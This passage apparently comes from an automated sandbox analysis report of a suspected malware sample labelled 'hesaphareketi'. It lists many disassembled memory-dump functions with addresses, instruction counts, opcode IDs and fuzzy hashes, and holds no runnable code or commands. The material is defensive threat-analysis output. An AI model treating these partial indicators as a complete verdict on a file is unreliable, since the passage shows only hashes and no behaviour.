                                            • Opcode Fuzzy Hash: b90a5ad149f884cdc4fdbf850b845cb9a138263bfb67d0c0662610803b5cb922
                                            • Instruction Fuzzy Hash: C3127234B006158FEB29AB38E99422C33A3FBD5305B104A79E105CB3A5CFB1ED479792
                                            Function 00CF9760 Relevance: .4, Instructions: 351COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9fce16bd6a79d4ebac19af542ffd2805b5f70c76792ee87b41fa3a6583ff3b4d
                                            • Instruction ID: 7f841f0ee5b2eb02265111a21051a994f784bbcc9c071154e35efaeaab1e35e2
                                            • Opcode Fuzzy Hash: 9fce16bd6a79d4ebac19af542ffd2805b5f70c76792ee87b41fa3a6583ff3b4d
                                            • Instruction Fuzzy Hash: E6C19070A002088FDF64DF69D880BAEBBB1FB85310F24856AD619DB395D771DD41CB92
                                            Function 00CF93E4 Relevance: .3, Instructions: 322COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de18736b8562f341339956c60669f4bfd127df85ed70476f37c0e041de8e893d
                                            • Instruction ID: 4a6f10144b3f25eed65141ed9146fdacd0b5d731ae13ab35e8bad52a7aae4f21
                                            • Opcode Fuzzy Hash: de18736b8562f341339956c60669f4bfd127df85ed70476f37c0e041de8e893d
                                            • Instruction Fuzzy Hash: F1C18F34A002088FDF64EF68D584BADBBB2FF88310F258565E916EB354DA35DD42CB51
                                            Function 00CF4A57 Relevance: .3, Instructions: 261COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 259c98d8f84c0930d732c56621ca3e66139266960488673e8e3c90c6136783b5
                                            • Instruction ID: 45090938ae122bb00beb3853f9dea8de040bd9259932154607ef647638b23e3e
                                            • Opcode Fuzzy Hash: 259c98d8f84c0930d732c56621ca3e66139266960488673e8e3c90c6136783b5
                                            • Instruction Fuzzy Hash: C3A16F70E0060DCFDB68CFA9D8857AEBBF2BF48314F248529D514E7294EB749945CB82
                                            Function 00CF3E3F Relevance: .2, Instructions: 234COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0229e580f7e2a60fc8b88eb2c27dc096a11cdc7e606bd337f6fd0812d7e1fb1
                                            • Instruction ID: bff175e62358f79ee6531ebabf4b469d9ca1012612f965ffc472a0e4fef2230f
                                            • Opcode Fuzzy Hash: e0229e580f7e2a60fc8b88eb2c27dc096a11cdc7e606bd337f6fd0812d7e1fb1
                                            • Instruction Fuzzy Hash: B3916B70E0024DDFDF64CFA9C8857EEBBF2AF48314F248129E515A7294DB749986CB42
                                            Function 00CF47CC Relevance: .2, Instructions: 182COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ab73b96de1573d368d0f55bd4a2d80e3dca20dd336ea9f7af8c83ef491a9e57
                                            • Instruction ID: b4054b503c8e1e7e4636754a385df6aab6c12c07035ee25d79d99f6c202517db
                                            • Opcode Fuzzy Hash: 1ab73b96de1573d368d0f55bd4a2d80e3dca20dd336ea9f7af8c83ef491a9e57
                                            • Instruction Fuzzy Hash: 6E716A70E0034D9FDF68DFA9C8857AEBBF1AF88314F148129E514A7294DB749942CB92
                                            Function 00CF47D8 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 20cd4652c9a55a20dfde95c80e18244a99557116db3aa5d512c27df488ac8d37
                                            • Instruction ID: fe66d7db68e4abf169913917a81cffa7b119c40394aabb7769c6e2b4655c317f
                                            • Opcode Fuzzy Hash: 20cd4652c9a55a20dfde95c80e18244a99557116db3aa5d512c27df488ac8d37
                                            • Instruction Fuzzy Hash: 23716B70E0034DDFDF68CFA9C8457AEBBF2AF88314F148129E514A7294DB749942CB92
                                            Function 00CFFD58 Relevance: .2, Instructions: 151COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4823f053ce9df96fd07129848360689d214ebe29dc8435eda231a20a8ea18a1a
                                            • Instruction ID: b0f6016561614015262bab6ffd459da2cebaf1e43d023ce82a1a5274a48286dc
                                            • Opcode Fuzzy Hash: 4823f053ce9df96fd07129848360689d214ebe29dc8435eda231a20a8ea18a1a
                                            • Instruction Fuzzy Hash: 81513734A003088FDB64DF68D554BADB7F1FF89304F2045A9E5199B361CB74AE46CB91
                                            Function 00CF6CA4 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9412c71b338f895b7b14232d05e7fea12d030716b6fabd2e68953b688d402b74
                                            • Instruction ID: aa719cbd22d58a6e2a183de2e0975768e44266eea6559524760e9d3cbff30206
                                            • Opcode Fuzzy Hash: 9412c71b338f895b7b14232d05e7fea12d030716b6fabd2e68953b688d402b74
                                            • Instruction Fuzzy Hash: BB514275E102188FDB18CFA9C885BADBBF1FF48314F148029E819AB391D774A844CF92
                                            Function 00CF6CB0 Relevance: .1, Instructions: 132COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b2a2ce384fcf1d62bbb32338f8665db89c911763619b8c87457a1942d07e480
                                            • Instruction ID: 271b850ba0e0208ade8a4fd0cbec510ef0910fbc49304195c6816a9b9a4793dd
                                            • Opcode Fuzzy Hash: 4b2a2ce384fcf1d62bbb32338f8665db89c911763619b8c87457a1942d07e480
                                            • Instruction Fuzzy Hash: 7B513275E102188FDB18CFA9C885BADBBB1BF48314F158129E815AB351CB74A844CF92
                                            Function 00CF1138 Relevance: .1, Instructions: 100COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6d607741ab75057e801b11fc220a85612d8d7a7164835a4461b5136022a943cb
                                            • Instruction ID: e44963dab1bfa3292f0ba1c590af21c940a97a02b36e673f743947511db9dff2
                                            • Opcode Fuzzy Hash: 6d607741ab75057e801b11fc220a85612d8d7a7164835a4461b5136022a943cb
                                            • Instruction Fuzzy Hash: 3B411B386053568FDB1AFB28FCC1B593F66F79130A7048968D0005F2BEDA70298BDB81
                                            Function 00CFF328 Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58d098c9fe09a2222f6692347f24956c509e31f4c14a5947f8c1c22648d64404
                                            • Instruction ID: e76b796e0f95404cf1144c0e420607d594248330495f80cb908ffd4ed708972d
                                            • Opcode Fuzzy Hash: 58d098c9fe09a2222f6692347f24956c509e31f4c14a5947f8c1c22648d64404
                                            • Instruction Fuzzy Hash: D0319E34E002098FCB19DF64D5946AEBBB2EF89310F14C529E916EB354EB71AD46CB41
                                            Function 00CF26A7 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86c79fff668a4e6e2f71f0352ce9386f7c4e1e4c35f12384aac0f1494a9e8207
                                            • Instruction ID: 3a3f3ad8827b51c5567883390a0d05c340e5a04ef2eda297ec0cea874e25c128
                                            • Opcode Fuzzy Hash: 86c79fff668a4e6e2f71f0352ce9386f7c4e1e4c35f12384aac0f1494a9e8207
                                            • Instruction Fuzzy Hash: 1941E2B0D0034D9FDB14DFA9C884ADEBBF1BF48314F24802AE919AB250DB759946CF91
                                            Function 00CFF338 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0bf84ceb4bbee248353a505971d774825d3fafa3fdfb8916f11d0cdd59e58e29
                                            • Instruction ID: 41c97455872a40e535a6afceca770b198767e7d65eb3f4a11232f8ca6dcebc65
                                            • Opcode Fuzzy Hash: 0bf84ceb4bbee248353a505971d774825d3fafa3fdfb8916f11d0cdd59e58e29
                                            • Instruction Fuzzy Hash: D1319C34E002098BDB19CF65D9946AEBBB2FF89300F10C529E816EB354EB70ED46CB51
                                            Function 00CF5061 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 58dfc798ca5043f36d4f1d18cb6841aed220f807a95c23b00ba9d966d5d98fd7
                                            • Instruction ID: d119fb00b9dac3463e5bbf58dd785945ddc760e0a8a5c8665803cfdc6fe55926
                                            • Opcode Fuzzy Hash: 58dfc798ca5043f36d4f1d18cb6841aed220f807a95c23b00ba9d966d5d98fd7
                                            • Instruction Fuzzy Hash: 66313730600618CFDB68EB74C9517BE77B2EB49305F204468DA06AB3A5DF36DD42CB92
                                            Function 00CF133F Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 17e0a2c0e08b143b0decac89ef82ca8b90311334c55db693666c64ee657b3415
                                            • Instruction ID: 2327d1013b1ebd9c89b879fbfa7520c2c7eeaac3b9848286f058c114d473a081
                                            • Opcode Fuzzy Hash: 17e0a2c0e08b143b0decac89ef82ca8b90311334c55db693666c64ee657b3415
                                            • Instruction Fuzzy Hash: 8931E538600355CFEF76A724EC9477C3B51EB81315F040A29D916CB3A8DA649D8BDBA3
                                            Function 00CF26B0 Relevance: .1, Instructions: 90COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9dfb02c615f763dee1bc8076d43c293c0bebe04769386bea2293d7f212e9fd52
                                            • Instruction ID: 38b0280eaa9633fc078e807112c6a448de7aa680492e90bcbb31836af8d88845
                                            • Opcode Fuzzy Hash: 9dfb02c615f763dee1bc8076d43c293c0bebe04769386bea2293d7f212e9fd52
                                            • Instruction Fuzzy Hash: F441E0B0D0034D9FDB14DFA9C484ADEBBF5BF48314F20802AE919AB250DB759945CF91
                                            Function 00CF5070 Relevance: .1, Instructions: 89COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f538980f2947331a39307826c669822a1372434c8a113830b96a48919271506
                                            • Instruction ID: 38bb0de92d482edd4a9862ef50e459831f3081b625b56e5cb995182703e77d35
                                            • Opcode Fuzzy Hash: 1f538980f2947331a39307826c669822a1372434c8a113830b96a48919271506
                                            • Instruction Fuzzy Hash: E5310830600618CBDB69EB74C9507AE77B2EB49345F204468DB06AB3A4DF36DD42CB92
                                            Function 00CF178B Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f1002e21922b5647fed7a3b182dd3ec563bb6f0847d442a22830ef2e1dda77f
                                            • Instruction ID: 9720172eca59440048b725b42ac3f1e8ce3e6a07514a6c9b43d494e32ba712be
                                            • Opcode Fuzzy Hash: 2f1002e21922b5647fed7a3b182dd3ec563bb6f0847d442a22830ef2e1dda77f
                                            • Instruction Fuzzy Hash: 4721F679F003548FCF62BB789C8476E7BA1EB48350F15452AD909C7359EA35CD068B92
                                            Function 00CF1450 Relevance: .1, Instructions: 86COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ad43cc94dc04e91cd4f9bd88a83c0a4cc6af78968424111bb44e5081f9e9762
                                            • Instruction ID: 21ef01ea5505937d7b5520230f54f8ee5b0f521e9adbdfcff6c6cd39b16cba52
                                            • Opcode Fuzzy Hash: 1ad43cc94dc04e91cd4f9bd88a83c0a4cc6af78968424111bb44e5081f9e9762
                                            • Instruction Fuzzy Hash: C821DE31A00259CFDFB59FB884402BD7BA5EF95320F28047ADA15E7252D635DE82CB62
                                            Function 00CF92D1 Relevance: .1, Instructions: 84COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9b9c43278499d9b6e54ac632f94a7fc4a10d157ff68ed341c8b6358cc02e57bf
                                            • Instruction ID: bf6b4f8a80c43de3cc71ccb3d0827d7c06c1593d589f3c31f0115e4a0ed696b2
                                            • Opcode Fuzzy Hash: 9b9c43278499d9b6e54ac632f94a7fc4a10d157ff68ed341c8b6358cc02e57bf
                                            • Instruction Fuzzy Hash: 06317C30E002099BDF59CF65D4907AEBBB2EF89300F108629E912EB295EB719D46CB51
                                            Function 00CF7059 Relevance: .1, Instructions: 82COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27089641f59d5f70c2ce890f3aada970b2ffaabceba7ff6122ce9e38501f987e
                                            • Instruction ID: ddf98096b6e732bd98a54af8425beb92151d0f3d97e81a4a37592db07f107954
                                            • Opcode Fuzzy Hash: 27089641f59d5f70c2ce890f3aada970b2ffaabceba7ff6122ce9e38501f987e
                                            • Instruction Fuzzy Hash: A3210C347002149FD709AB78D894B6E7BA7EBC8711B108468E5069B3A8DF759C43DB50
                                            Function 00CF166B Relevance: .1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9414115a12bb10a6737c8390630c4aa5961d6de3964a3401c03ca81f4bb2f87d
                                            • Instruction ID: 19488c66b6be531e6230ad1235d52071f36ef0bd723eeee68bf418678ccd6b56
                                            • Opcode Fuzzy Hash: 9414115a12bb10a6737c8390630c4aa5961d6de3964a3401c03ca81f4bb2f87d
                                            • Instruction Fuzzy Hash: D0217838A002008FDF62FB34ECC47393B61EB41351F190A66E406CB2A9DA20DD4B9B93
                                            Function 00CF92E0 Relevance: .1, Instructions: 78COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 50d939e1e1355211d159bc1cc76ad8e847af1f976f21c83dd6ba4607f2dd18a5
                                            • Instruction ID: 0e7744c04f8e48e74be306be55bf41bec4d051d68d88b88641d9f1950c8fea65
                                            • Opcode Fuzzy Hash: 50d939e1e1355211d159bc1cc76ad8e847af1f976f21c83dd6ba4607f2dd18a5
                                            • Instruction Fuzzy Hash: E1218F30E002099BDF59CF65D4907AEB7B2FF89300F108629E915EB294DB70AD46CB91
                                            Function 00CF91D0 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f6c8852122cc926134d4eec01b18e1d3e21a79fd79c4e9885139f825e8e9e6
                                            • Instruction ID: 3c2e73f92b3363eb3c48e853355dccbb93aaeca446f70f537aed72e4fbe84320
                                            • Opcode Fuzzy Hash: e1f6c8852122cc926134d4eec01b18e1d3e21a79fd79c4e9885139f825e8e9e6
                                            • Instruction Fuzzy Hash: 2421B535E002199BDF49CFA5C444BEEF7B1EF89310F20862AE915BB240DB709D46CB51
                                            Function 00CF4F53 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6cc13c3f10bd7409a68afbff0696d2b10a641c87aa75baed778b7da78f28139f
                                            • Instruction ID: 48192f33eb6dcbba914e2cf17c7448b64b40109ea47b931adfecf8479e94e7d3
                                            • Opcode Fuzzy Hash: 6cc13c3f10bd7409a68afbff0696d2b10a641c87aa75baed778b7da78f28139f
                                            • Instruction Fuzzy Hash: 57210C34700249CFDB54EB78C959BAE7BF1EF48350B2044A8E606EB361DB359D41CB61
                                            Function 00C5D1E4 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e0ab5684ee46acf3020893c2a5909c8afcf13e16ecc3662dab5e41329d4a011
                                            • Instruction ID: bbebcc482d4a2a180c8ec74cb2a9b1fa9a77813b2a272093a3fe0f27d5d782e6
                                            • Opcode Fuzzy Hash: 8e0ab5684ee46acf3020893c2a5909c8afcf13e16ecc3662dab5e41329d4a011
                                            • Instruction Fuzzy Hash: E3210479604300DFDB24DF10D984B16BB65FB84321F20C669DC0A0B246C336DC8ACAA6
                                            Function 00C5D394 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f45e2afa95d921c8496cef09676fdd3d940daa49d302cdb65233af170394939
                                            • Instruction ID: 75f084b8dd006d960863bb06f152ffef8f0452871fbc6cda1a1a154047f51fff
                                            • Opcode Fuzzy Hash: 0f45e2afa95d921c8496cef09676fdd3d940daa49d302cdb65233af170394939
                                            • Instruction Fuzzy Hash: AB21F579604340DFDB24DF14D5C0B16BB65FB84316F20C5ADEC4B4B292C336E88ACA66
                                            Function 00C5D01C Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3681398682.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_c5d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4ff217fe1b997f8aa7fbce59f8a67935f410d1e8b378779e0676ef0fccd8155e
                                            • Instruction ID: 5874d9de6620adde98a4d0973e7206cfd5d256c31e65f517b7c3e8a82d29f7f8
                                            • Opcode Fuzzy Hash: 4ff217fe1b997f8aa7fbce59f8a67935f410d1e8b378779e0676ef0fccd8155e
                                            • Instruction Fuzzy Hash: 5B21D379604300DFDB24DF14D9C4B16BB65EBC4315F20C569DC4A4B296C336D88BCA66
                                            Function 00CF91E0 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd828344a31885caedfa9f9edd272d151e8cb01984d650a627d63579714315f8
                                            • Instruction ID: f81d2dfc9afa06cda88f8e6a712b65c6c1d62f8ec1809fe143e480fb16e7f200
                                            • Opcode Fuzzy Hash: dd828344a31885caedfa9f9edd272d151e8cb01984d650a627d63579714315f8
                                            • Instruction Fuzzy Hash: D1218331E006199BDF49CFA5C444BAEF7B2EF89310F20852AE915BB340DB70AD42CB51
                                            Function 00CF1850 Relevance: .1, Instructions: 70COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 554534e9c1d6fbe41ff968539e58341bc661240e908733d0ad9ab38602825804
                                            • Instruction ID: 2ce606a48d95f7ae3a2733ee85324cd9c256060955cee8a20dd80da1b12803b3
                                            • Opcode Fuzzy Hash: 554534e9c1d6fbe41ff968539e58341bc661240e908733d0ad9ab38602825804
                                            • Instruction Fuzzy Hash: D3213C30B00248CFDB64EB75C5657AE77F6AB49340F240468DA06EB390DF729E41CBA2
                                            Function 00CF1678 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: de55bbc704931fa581789dbf9e149a692ad3d4c6c2ef11c479fb159bdaca9ba7
                                            • Instruction ID: 2aacf6c7a5d96a613ada61f6e3e63392a32d46f7daf43dd78a8f51338e29580e
                                            • Opcode Fuzzy Hash: de55bbc704931fa581789dbf9e149a692ad3d4c6c2ef11c479fb159bdaca9ba7
                                            • Instruction Fuzzy Hash: F321D538A002148FDF61FB64ECC472A3755EB44355F154A25E50ACB2A8DE24ED469BD2
                                            Function 00CF1840 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 797ab4ea38139f9a514bb2bc9ebeaa7ff65c9b00df77a762bc4d5e4814cce9f0
                                            • Instruction ID: 12e0054f8f10f7eead02364c92381d63647ca4ca0af92f0d3b7f84afab226824
                                            • Opcode Fuzzy Hash: 797ab4ea38139f9a514bb2bc9ebeaa7ff65c9b00df77a762bc4d5e4814cce9f0
                                            • Instruction Fuzzy Hash: BC214C30B00258CFDB64EB74C5647BE77F1AB49344F280468DA05EB391DB769E41CBA2
                                            Function 00CF4F60 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.3682796093.0000000000CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_cf0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5856aaac6d3d51f5617a4371023caf956b4e02a63233e66a6f6dff1df3847d8
